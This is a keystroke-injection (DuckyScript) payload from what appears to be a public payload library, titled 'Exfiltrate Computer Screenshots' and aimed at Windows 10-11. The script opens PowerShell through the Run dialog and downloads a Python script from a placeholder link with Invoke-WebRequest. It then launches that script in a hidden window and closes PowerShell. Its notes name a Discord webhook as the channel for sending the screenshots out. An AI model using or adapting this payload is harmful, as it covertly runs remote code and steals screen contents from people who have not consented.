Path: blob/master/payloads/library/exfiltration/Exfiltrate Computer Screenshots/payload.txt
2968 views
REM ###################################################1REM # |2REM # Title : Exfiltrate Computer Screenshots |3REM # Author : Aleff |4REM # Version : 1.0 |5REM # Category : Exfiltrate |6REM # Target : Windows 10-11 |7REM # |8REM ###################################################91011REM Requirements:12REM - Internet Connection13REM - Discord Webhook (or whatever you want for the exfiltration)14REM - ExecutionPolicy Bypass15REM - Python161718REM REQUIRED - Set your Python script link19DEFINE SCRIPT-PY-LINK example.com202122DELAY 100023GUI r24DELAY 100025STRING powershell26ENTER27DELAY 2000282930STRING Invoke-WebRequest -Uri "31STRING SCRIPT-PY-LINK32STRING " -OutFile "script.py"33ENTER34DELAY 20003536STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden37DELAY 100038ALT F4394041